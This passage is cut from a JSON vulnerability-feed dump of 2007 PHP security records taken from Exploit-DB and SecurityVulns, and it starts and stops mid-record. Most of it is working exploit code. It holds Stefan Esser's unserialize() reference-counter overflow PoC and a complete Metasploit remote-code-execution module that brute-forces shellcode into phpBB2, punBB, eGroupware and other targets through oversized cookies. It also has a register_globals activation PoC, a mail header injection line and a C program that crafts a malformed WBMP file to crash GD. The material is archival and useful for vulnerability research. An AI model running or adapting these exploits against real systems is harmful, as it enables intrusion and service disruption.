"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29692/"}, {"lastseen": "2016-01-31T18:23:27", "bulletinFamily": "exploit", "description": "PHP <= 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC. CVE-2007-1286. Dos exploit for linux platform", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "id": "EDB-ID:3396", "href": "https://www.exploit-db.com/exploits/3396/", "type": "exploitdb", "title": "PHP <= 4.4.4 unserialize ZVAL Reference Counter Overflow Exploit PoC", "sourceData": "<?php\n ////////////////////////////////////////////////////////////////////////\n // _ _ _ _ ___ _ _ ___ //\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\n // //\n // Proof of concept code from the Hardened-PHP Project //\n // (C) Copyright 2007 Stefan Esser //\n // //\n ////////////////////////////////////////////////////////////////////////\n // PHP 4 - unserialize() Reference Counter Overflow //\n ////////////////////////////////////////////////////////////////////////\n\n // This is meant as a protection against remote file inclusion.\n die(\"REMOVE THIS LINE\");\n \n // This exploit is only designed for linux x86 systems\n // where 0x08064058 is a readable address in the PHP process \n // (should be unless binary images are relocated default systems)\n // \n // The exploit does nothing useful. It just proves that the CPU\n // will try to execute the instruction at 0x99887766 which results\n // in a crash. Just replace it with a pointer to your shellcode and\n // it will work.\n //\n // To exploit phpBB2 with this you need to put a similar string\n // into the cookie. You must work around the size limit of HTTP\n // headers by using MANY Cookie: headers (not folded lines, real\n // headers). Additionally you must put at the end of ever line\n // a line terminator s:2:\" and start every following line with\n // \";N; of course with URL encoded ';'\n\n $hashtable = str_repeat(\"A\", 39);\n \n $hashtable[5*4+0]=chr(0x58);\n $hashtable[5*4+1]=chr(0x40);\n $hashtable[5*4+2]=chr(0x06);\n $hashtable[5*4+3]=chr(0x08);\n \n $hashtable[8*4+0]=chr(0x66);\n $hashtable[8*4+1]=chr(0x77);\n $hashtable[8*4+2]=chr(0x88);\n $hashtable[8*4+3]=chr(0x99);\n\n $str = 'a:100000:{s:8:\"AAAABBBB\";a:3:{s:12:\"0123456789AA\";a:1:{s:12:\"AAAABBBBCCCC\";i:0;}s:12:\"012345678AAA\";i:0;s:12:\"012345678BAN\";i:0;}';\n for ($i=0; $i<65535; $i++) {\n $str .= 'i:0;R:2;';\n }\n $str .= 's:39:\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\";s:39:\"'.$hashtable.'\";i:0;R:3;';\n\n unserialize($str);\n\n?>\n\n# milw0rm.com [2007-03-02]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3396/"}, {"lastseen": "2016-02-01T23:34:32", "bulletinFamily": "exploit", "description": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie). CVE-2007-1286. Remote exploits for multiple platform", "modified": "2010-09-20T00:00:00", "published": "2010-09-20T00:00:00", "id": "EDB-ID:16310", "href": "https://www.exploit-db.com/exploits/16310/", "type": "exploitdb", "title": "PHP 4 unserialize ZVAL Reference Counter Overflow Cookie", "sourceData": "##\r\n# $Id: php_unserialize_zval_cookie.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Brute\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits an integer overflow vulnerability in the unserialize()\r\n\t\t\t\tfunction of the PHP web server extension. This vulnerability was patched by\r\n\t\t\t\tStefan in version 4.5.0 and applies all previous versions supporting this function.\r\n\t\t\t\tThis particular module targets numerous web applications and is based on the proof\r\n\t\t\t\tof concept provided by Stefan Esser. This vulnerability requires approximately 900k\r\n\t\t\t\tof data to trigger due the multiple Cookie headers requirement. Since we\r\n\t\t\t\tare already assuming a fast network connection, we use a 2Mb block of shellcode for\r\n\t\t\t\tthe brute force, allowing quick exploitation for those with fast networks.\r\n\r\n\t\t\t\tOne of the neat things about this vulnerability is that on x86 systems, the EDI register points\r\n\t\t\t\tinto the beginning of the hashtable string. This can be used with an egghunter to\r\n\t\t\t\tquickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\r\n\t\t\t\tis known. The EDI method is faster, but the bandwidth-intensive brute force used by this\r\n\t\t\t\tmodule is more reliable across a wider range of systems.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm', # module development\r\n\t\t\t\t\t'GML <grandmasterlogic [at] gmail.com>', # module development and debugging\r\n\t\t\t\t\t'Stefan Esser <sesser [at] hardened-php.net>' # discovered, patched, exploited\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2007-1286'],\r\n\t\t\t\t\t['OSVDB', '32771'],\r\n\t\t\t\t\t['URL', 'http://www.php-security.org/MOPB/MOPB-04-2007.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# 64-bit SuSE: 0x005c0000\r\n\t\t\t\t\t# Backtrack 2.0: 0xb797a000\r\n\t\t\t\t\t# Gentoo: 0xb6900000\r\n\t\t\t\t\t#\r\n\t\t\t\t\t[ 'Linux x86 Generic',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 phpBB2',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'phpbb2mysql_data',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/phpBB2/faq.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*phpBB/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 punBB',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'punbb_cookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*PunBB/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 WWWThreads',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'forum_cookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*WWWThreads/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 Deadman Redirect',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'authcookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/dmr/dmr.php',\r\n\t\t\t\t\t\t\t'Signature' => /document\\.f\\.userdata\\.focus/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 PhpWebGallery',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'pwg_remember',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/phpwebgallery/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Powered\\s+by.*phpwebgallery/msi,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 Ariadne-CMS',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'ARCookie',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/ariadne/loader.php/',\r\n\t\t\t\t\t\t\t'Signature' => /Ariadne is free software/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 ProMA',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'proma',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/proma/index.php',\r\n\t\t\t\t\t\t\t'Signature' => /Change Account Information/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[ 'Linux x86 eGroupware',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'DefaultCookie' => 'eGW_remember',\r\n\t\t\t\t\t\t\t'DefaultURI' => '/egroupware/login.php',\r\n\t\t\t\t\t\t\t'Signature' => /www.egroupware.org/,\r\n\t\t\t\t\t\t\t'Platform' => 'linux',\r\n\t\t\t\t\t\t\t'Arch' => [ ARCH_X86 ],\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6000400 },\r\n\t\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xbfff0000 },\r\n\t\t\t\t\t\t\t\t\t'Step' => 1024*1024\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 04 2007'))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('URI', [false, \"The path to vulnerable PHP script\"]),\r\n\t\t\t\t\tOptString.new('COOKIENAME', [false, \"The name of the cookie passed to unserialize()\"])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\tprint_status(\"Checking for a vulnerable PHP version...\")\r\n\r\n\t\t#\r\n\t\t# Pick the URI and Cookie name\r\n\t\t#\r\n\t\tcookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\r\n\t\turi_path = datastore['URI'] || target['DefaultURI']\r\n\r\n\t\tif(not cookie_name)\r\n\t\t\traise RuntimeError, \"The COOKIENAME option must be set\"\r\n\t\tend\r\n\r\n\t\tif(not uri_path)\r\n\t\t\traise RuntimeError, \"The URI option must be set\"\r\n\t\tend\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => uri_path,\r\n\t\t\t'method'\t => 'GET'\r\n\t\t}, 5)\r\n\r\n\t\tphp_bug = false\r\n\r\n\t\tif (not res)\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\thttp_fingerprint({ :response => res }) # check method\r\n\r\n\t\tif (res.code != 200)\r\n\t\t\tprint_status(\"The server returned #{res.code} #{res.message}\")\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tif (\r\n\t\t\t\t(res.headers['X-Powered-By'] and res.headers['X-Powered-By'] =~ /PHP\\/(.*)/) or\r\n\t\t\t\t(res.headers['Server'] and res.headers['Server'] =~ /PHP\\/(.*)/)\r\n\t\t\t)\r\n\r\n\t\t\tphp_raw = $1\r\n\t\t\tphp_ver = php_raw.split('.')\r\n\r\n\t\t\tif (php_ver[0].to_i == 4 and php_ver[1] and php_ver[2] and php_ver[1].to_i < 5)\r\n\t\t\t\tprint_status(\"The server runs a vulnerable version of PHP (#{php_raw})\")\r\n\t\t\t\tphp_bug = true\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"The server runs a non-vulnerable version of PHP (#{php_raw})\")\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# Detect the phpBB cookie name\r\n\t\tif (res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /(.*)_(sid|data)=/)\r\n\t\t\tprint_status(\"The server may require a cookie name of '#{$1}_data'\")\r\n\t\tend\r\n\r\n\t\tif(target and target['Signature'])\r\n\t\t\tif (res.body and res.body.match(target['Signature']))\r\n\t\t\t\tprint_status(\"Detected target #{target.name}\")\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Did not detect target #{target.name}\")\r\n\t\t\tend\r\n\r\n\t\tend\r\n\r\n\t\treturn php_bug ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Appears\r\n\tend\r\n\r\n\r\n\tdef brute_exploit(target_addrs)\r\n\r\n\t\tzvalref = encode_semis('i:0;R:2;')\r\n\r\n#\r\n# Use this if we decide to do 'jmp edi' returns vs brute force\r\n#\r\n=begin\r\n\t\t# Linux specific egg-hunter\r\n\t\ttagger = \"\\x90\\x50\\x90\\x50\"\r\n\t\thunter =\r\n\t\t\t\"\\xfc\\x66\\x81\\xc9\\xff\\x0f\\x41\\x6a\\x43\\x58\\xcd\\x80\" +\r\n\t\t\t\"\\x3c\\xf2\\x74\\xf1\\xb8\" +\r\n\t\t\ttagger +\r\n\t\t\t\"\\x89\\xcf\\xaf\\x75\\xec\\xaf\\x75\\xe9\\xff\\xe7\"\r\n\r\n\t\tegghunter = \"\\xcc\" * 39\r\n\t\tegghunter[0, hunter.length] = hunter\r\n\r\n\t\thashtable = \"\\xcc\" * 39\r\n\t\thashtable[0, 2] = \"\\xeb\\xc6\" # jmp back 32 bytes\r\n\r\n\t\thashtable[20, 4] = [target_addrs['Ret']].pack('V')\r\n\t\thashtable[32, 4] = [target_addrs['Ret']].pack('V')\r\n=end\r\n\r\n\t\t#\r\n\t\t# Just brute-force addresses for now\r\n\t\t#\r\n\t\ttagger = ''\r\n\t\tegghunter = rand_text_alphanumeric(39)\r\n\t\thashtable = rand_text_alphanumeric(39)\r\n\t\thashtable[20, 4] = [target_addrs['Ret']].pack('V')\r\n\t\thashtable[32, 4] = [target_addrs['Ret']].pack('V')\r\n\r\n\r\n\t\t#\r\n\t\t# Pick the URI and Cookie name\r\n\t\t#\r\n\t\tcookie_name = datastore['COOKIENAME'] || target['DefaultCookie']\r\n\t\turi_path = datastore['URI'] || target['DefaultURI']\r\n\r\n\t\tif(not cookie_name)\r\n\t\t\traise RuntimeError, \"The COOKIENAME option must be set\"\r\n\t\tend\r\n\r\n\t\tif(not uri_path)\r\n\t\t\traise RuntimeError, \"The URI option must be set\"\r\n\t\tend\r\n\r\n\t\t# Generate and reuse the original buffer to save CPU\r\n\t\tif (not @saved_cookies)\r\n\r\n\t\t\t# Building the malicious request\r\n\t\t\tprint_status(\"Creating the request...\")\r\n\r\n\t\t\t# Create the first cookie header to get this started\r\n\t\t\tcookie_fun = \"Cookie: #{cookie_name}=\"\r\n\t\t\tcookie_fun << Rex::Text.uri_encode(\r\n\t\t\t\t'a:100000:{s:8:\"' +\r\n\t\t\t\trand_text_alphanumeric(8) +\r\n\t\t\t\t'\";a:3:{s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";a:1:{s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";i:0;}s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";'+\r\n\t\t\t\t'i:0;s:12:\"' +\r\n\t\t\t\trand_text_alphanumeric(12) +\r\n\t\t\t\t'\";i:0;}'\r\n\t\t\t)\r\n\t\t\tcookie_fun << zvalref * 500\r\n\t\t\tcookie_fun << Rex::Text.uri_encode('s:2:\"')\r\n\t\t\tcookie_fun << \"\\r\\n\"\r\n\r\n\t\t\trefcnt = 1000\r\n\t\t\trefmax = 65535\r\n\r\n\t\t\t# Keep adding cookie headers...\r\n\t\t\twhile(refcnt < refmax)\r\n\r\n\t\t\t\tchead = 'Cookie: ';\r\n\t\t\t\tchead << encode_semis('\";N;')\r\n\r\n\t\t\t\t# Stay within the 8192 byte limit\r\n\t\t\t\t0.upto(679) do |i|\r\n\t\t\t\t\tbreak if refcnt >= refmax\r\n\t\t\t\t\trefcnt += 1\r\n\r\n\t\t\t\t\tchead << zvalref\r\n\t\t\t\tend\r\n\t\t\t\tchead << encode_semis('s:2:\"')\r\n\t\t\t\tcookie_fun << chead + \"\\r\\n\"\r\n\t\t\tend\r\n\r\n\t\t\t# The final header, including the hashtable with return address\r\n\t\t\tcookie_fun << \"Cookie: \"\r\n\t\t\tcookie_fun << Rex::Text.uri_encode('\";N;')\r\n\t\t\tcookie_fun << zvalref * 500\r\n\r\n\t\t\t@saved_cookies = cookie_fun\r\n\t\tend\r\n\r\n\t\t# Generate and reuse the payload to save CPU time\r\n\t\tif (not @saved_payload)\r\n\t\t\t@saved_payload = ((tagger + tagger + make_nops(8192) + payload.encoded) * 256)\r\n\t\tend\r\n\r\n\t\tcookie_addrs = Rex::Text.uri_encode(\r\n\t\t\t's:39:\"' + egghunter + '\";s:39:\"'+ hashtable +'\";i:0;R:3;'\r\n\t\t) + \"\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying address 0x%.8x...\" % target_addrs['Ret'])\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri'\t\t => uri_path,\r\n\t\t\t'method'\t => 'POST',\r\n\t\t\t'raw_headers' => @saved_cookies + cookie_addrs,\r\n\t\t\t'data' => @saved_payload\r\n\t\t}, 1)\r\n\r\n\r\n\t\tif res\r\n\t\t\tfailed = false\r\n\r\n\t\t\tprint_status(\"Received a response: #{res.code} #{res.message}\")\r\n\r\n\t\t\tif (res.code != 200)\r\n\t\t\t\tprint_error(\"The server returned a non-200 response, indicating that the exploit failed.\")\r\n\t\t\t\tfailed = true\r\n\t\t\tend\r\n\r\n\t\t\tif (not failed and (res.body and res.body.length > 0))\r\n\t\t\t\tprint_error(\"The server returned a real response, indicating that the exploit failed.\")\r\n\t\t\t\tfailed = true\r\n\t\t\tend\r\n\r\n\t\t\tif (failed)\r\n\t\t\t\tprint_status(\"Please verify the URI and COOKIENAME parameters.\")\r\n\t\t\t\tprint_line('')\r\n\t\t\t\tprint_line(\"*\" * 40)\r\n\t\t\t\tprint_line(res.body)\r\n\t\t\t\tprint_line(\"*\" * 40)\r\n\t\t\t\tprint_line('')\r\n\r\n\t\t\t\traise RuntimeError, \"Exploit settings are probably wrong\"\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"No response from the server\")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef encode_semis(str)\r\n\t\tstr.gsub(';') { |s| sprintf(\"%%%.2x\", s[0]) }\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16310/"}, {"lastseen": "2016-02-03T11:03:32", "bulletinFamily": "exploit", "description": "PHP 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness. CVE-2007-1583. Remote exploit for php platform", "modified": "2007-03-19T00:00:00", "published": "2007-03-19T00:00:00", "id": "EDB-ID:29752", "href": "https://www.exploit-db.com/exploits/29752/", "type": "exploitdb", "title": "PHP <= 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness", "sourceData": "source: http://www.securityfocus.com/bid/23016/info\r\n\r\nPHP is prone to a weakness that allows attackers to enable the 'register_globals' directive because the application fails to handle a memory-limit exception.\r\n\r\nEnabling the PHP 'register_globals' directive may allow attackers to further exploit latent vulnerabilities in PHP scripts.\r\n\r\nThis issue is related to the weakness found in the non-multibyte 'parse_str()' from BID 15249 - PHP Parse_Str Register_Globals Activation Weakness.\r\n\r\nThis issue affects PHP 4 to 4.4.6 and 5 to 5.2.1.\r\n\r\n<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP mb_parse_str() register_globals Activation Exploit //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // The following string will be parsed and will violate the memory_limit\r\n $str = \"a=\".str_repeat(\"A\", 164000);\r\n\r\n // This code just fills the memory up to the limit...\r\n $limit = ini_get(\"memory_limit\");\r\n if (strpos($limit, \"M\")) {\r\n $limit *= 1024 * 1024;\r\n } else if (strpos($limit, \"K\")) {\r\n $limit *= 1024;\r\n } else $limit *=1;\r\n while ($limit - memory_get_usage(true) > 2048) $x[] = str_repeat(\"A\", 1024);\r\n\r\n // Will activate register_globals and trigger the memory_limit\r\n mb_parse_str($str);\r\n?>\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/29752/"}, {"lastseen": "2016-02-03T11:07:30", "bulletinFamily": "exploit", "description": "PHP 5.2.1 Folded Mail Headers Email Header Injection Vulnerability. CVE-2007-1717,CVE-2007-1718. Remote exploit for php platform", "modified": "2007-11-26T00:00:00", "published": "2007-11-26T00:00:00", "id": "EDB-ID:29784", "href": "https://www.exploit-db.com/exploits/29784/", "type": "exploitdb", "title": "PHP <= 5.2.1 Folded Mail Headers Email Header Injection Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/23145/info\r\n\r\nPHP is prone to an email-header-injection vulnerability because it fails to properly sanitize user-supplied input when constructing email messages.\r\n\r\nExploiting this issue allows a malicious user to create arbitrary email headers, and then create and transmit spam messages from the affected computer.\r\n\r\nThe following versions are vulnerable:\r\n\r\nPHP 4 up to and including 4.4.6\r\nPHP 5 up to and including 5.2.1\r\n\r\n<?php\r\n mail(\"test@domain(dot)com\", \"Test\\r\\n \\nAnother-Header: Blub\", \"Message\");\r\n?>", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/29784/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "description": "There is an integer overflow in PHP in ext/gd/libgd/wbmp.c in the\r\nfunction readwbmp. If large enough values are specified for wbmp image\r\nheight and/or width, so that width*height > 2^32, an integer overflow\r\noccurs on the following line\r\n\r\nif ((wbmp->bitmap = (int *) safe_emalloc(wbmp->width * wbmp->height,\r\nsizeof(int), 0)) == NULL)\r\n\r\ncausing the amount of memory allocated to be smaller than the amount\r\nof data to be read, subsequently causing buffer overflow (See the DoS\r\nPoC below).\r\n\r\nUpon discovery, I first thought this to be a LibGD issue, however the\r\nfile wbmp.c is changed in LibGD (as early as in version 2.0.33\r\nreleased in 2004) and does not have this overflow.\r\n\r\nAs the only values written in memory upon exploiting this can be\r\n(int)0 and (int)1, exploiting this for anything other then DoS seems\r\nhighly unlikely.\r\n\r\nTimeline\r\n\r\nFeb 14 2007 - Vulnerability discovered\r\nMar 7 2007 - Vendor contacted\r\nMar 7 2007 - Vendor responded, confirmed the bug and said they plan to\r\nfix it in PHP 5.2.2, which is to be released in April\r\nApr 7 2007 - Release of this advisory\r\n\r\nNote: I was going to wait until the release of PHP 5.2.2 before\r\npublishing this, but seeing FrSIRT (and possibly others) already\r\npubished it I am pushing the release forward a bit.\r\n\r\nReferences\r\n\r\nhttp://www.php.net/\r\nhttp://ifsec.blogspot.com/2007/04/php-521-wbmp-file-handling-integer.html\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1001\r\nhttp://www.frsirt.com/english/advisories/2007/1269\r\n\r\nPoC\r\n\r\n#define BUFSIZE 1000000\r\n\r\n#include <stdio.h>\r\n\r\nint main()\r\n{\r\n int c;\r\n char buf[BUFSIZE];\r\n\r\n FILE *fp = fopen("test.wbmp","w");\r\n\r\n //write header\r\n c = 0;\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n\r\n //write width = 2^32 / 4 + 1\r\n c = 0x84;\r\n fputc(c,fp);\r\n c = 0x80;\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n fputc(c,fp);\r\n c = 0x01;\r\n fputc(c,fp);\r\n\r\n //write height = 4\r\n c = 0x04;\r\n fputc(c,fp);\r\n\r\n //write some data to cause overflow\r\n fwrite(buf,sizeof(buf),1,fp);\r\n\r\n fclose(fp);\r\n}\r\n\r\n\r\n<?php\r\n$image = imagecreatefromwbmp('test.wbmp'); //overflow occurs\r\n?>", "modified": "2007-04-08T00:00:00", "published": "2007-04-08T00:00:00", "id": 